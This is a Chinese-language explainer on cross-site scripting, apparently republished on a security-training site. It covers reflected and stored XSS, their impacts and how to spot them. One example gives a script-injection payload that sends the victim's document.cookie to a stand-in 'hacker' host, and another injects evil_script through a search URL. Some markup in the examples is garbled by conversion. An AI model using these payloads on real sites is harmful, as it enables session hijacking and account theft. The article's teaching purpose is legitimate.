为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

黑客XSS攻击注入详解

2018-8-25 02:23| 投稿: xiaotiger |来自: 互联网

摘要: XSS - 什么是跨站点脚本?跨站点脚本(也称为XSS) 是最常见的应用层Web攻击之一。XSS漏洞针对嵌入在客户端(在用户的Web浏览器中)而不是在服务器端执行的页面中的脚本。XSS本身就是由客户端脚本语言(如HTML和Java ...

XSS - 什么是跨站点脚本?

跨站点脚本(也称为XSS) 是最常见的应用层Web攻击之一。XSS漏洞针对嵌入在客户端(在用户的Web浏览器中)而不是在服务器端执行的页面中的脚本。XSS本身就是由客户端脚本语言(如HTML和JavaScript)的互联网安全漏洞带来的威胁。XSS的概念是操纵Web应用程序的客户端脚本以恶意用户所需的方式执行。这样的操作可以将脚本嵌入到页面中,该页面可以在每次加载页面时执行,或者每当执行相关事件时执行。

XSS是当今软件中最常见的安全漏洞。这不应该是这种情况,因为XSS很容易找到并且易于修复。XSS漏洞可能会导致诸如篡改和敏感数据被盗等后果。

XSS的关键概念

  • XSS是对易受攻击的Web应用程序执行的基于Web的攻击。
  • 在XSS攻击中,受害者是用户而不是应用程序。
  • 在XSS攻击中,恶意内容使用JavaScript传递给用户。

解释跨站点脚本

当Web应用程序从用户获取数据并在没有首先正确验证数据的情况下将其动态地包含在网页中时,就会出现XSS漏洞。XSS漏洞允许攻击者执行任意命令并在受害用户的浏览器中显示任意内容。成功的XSS攻击会导致攻击者在易受攻击的Web应用程序上控制受害者的浏览器或帐户。虽然XSS是由Web应用程序中的易受攻击的页面启用的,但XSS攻击的受害者是应用程序的用户,而不是应用程序本身。XSS漏洞的效力在于恶意代码在受害者会话的上下文中执行,允许攻击者绕过正常的安全限制。

XSS攻击示例

反射XSS

攻击者可以通过多种方式诱使受害者发起反射XSS请求。例如,攻击者可能会向受害者发送包含恶意JavaScript的链接的误导性电子邮件。如果受害者点击链接,则会从受害者的浏览器发起HTTP请求并将其发送到易受攻击的Web应用程序。然后,恶意JavaScript被反射回受害者的浏览器,在受害者用户的会话中执行该浏览器。

持久的XSS

考虑一个允许用户输入每个用户的个人资料页面上显示的用户名的Web应用程序。应用程序将每个用户名存储在本地数据库中。恶意用户注意到Web应用程序无法清理用户名字段并输入恶意JavaScript代码作为其用户名的一部分。当其他用户查看攻击者的个人资料页面时,恶意代码会在其会话的上下文中自动执行。

跨站点脚本的影响

当攻击者成功利用XSS漏洞时,他们可以获得对帐户凭据的访问权限。它们还可以传播Web蠕虫或访问用户的计算机并查看用户的浏览器历史记录或远程控制浏览器。在获得对受害者系统的控制后,攻击者还可以分析和使用其他Intranet应用程序。

通过利用XSS漏洞,攻击者可以执行恶意操作,例如:

  • 劫持一个帐户。
  • 传播网络蠕虫。
  • 访问浏览器历史和剪贴板内容。
  • 远程控制浏览器。
  • 扫描并利用Intranet设备和应用程序。

识别跨站点脚本漏洞

如果出现以下情况,可能会出现XSS漏洞

  • 未验证进入Web应用程序的输入
  • 输出到浏览器不是HTML编码的

XSS示例

示例1.

例如,HTML片段:

示例文档:%(title)</ title></p><p>旨在说明一个模板片段,如果变量标题具有值Cross-Site Scripting,则会生成以下HTML发送到浏览器:</p><p><title>示例文档:XSS Doc </ title></p><p>包含搜索字段的站点没有正确的输入清理。通过制作如下所示的搜索查询:</p><p>“> <SCRIPT> var + img = new + Image(); img.src =” http:// hacker / “%20 +%20document.cookie; </ SCRIPT></p><p>坐在另一端,在网络服务器上,你将收到点击,其中双倍空间是用户的cookie。如果管理员单击该链接,攻击者可能会窃取会话ID并劫持会话。</p><p><strong>示例2.</strong></p><p>假设Google网站上有一个网址, http://www.google.com/search?</p><p>q = flowers,它返回包含片段的HTML文档<p>您对花的搜索返回了以下结果:</ p></p><p>即,查询参数q的值被插入到Google返回的页面中。进一步假设数据未经过验证,过滤或转义。 </p><p>Evil.org可能会建立一个页面,导致在浏览器中加载以下URL(例如,在一个不可见的<iframe>中):http://www.google.com/search? q = flowers +%3Cscript%3Eevil_script ( )%3C /脚本%3E</p><p>当受害者从www.evil.org加载此页面时,浏览器将从上面的URL加载iframe。加载到iframe中的文档现在将包含片段</p><p><p>您搜索flowers <script> evil_script()</ script> </p><p>返回以下结果:</ p></p><p>加载此页面将导致浏览器执行 evil_script( )。此外,此脚本将在从www.google.com加载的页面的上下文中执行 。</p><p><strong>XSS备忘单:防止跨站点脚本攻击</strong></p><p>跨站点脚本备忘单提供了有关跨站点脚本的信息摘要。我们的XSS备忘单详细介绍了不同类型的跨站点脚本,并向您展示了如何防止跨站点脚本漏洞。</p></div></div>


小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6593260748930023949/

免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部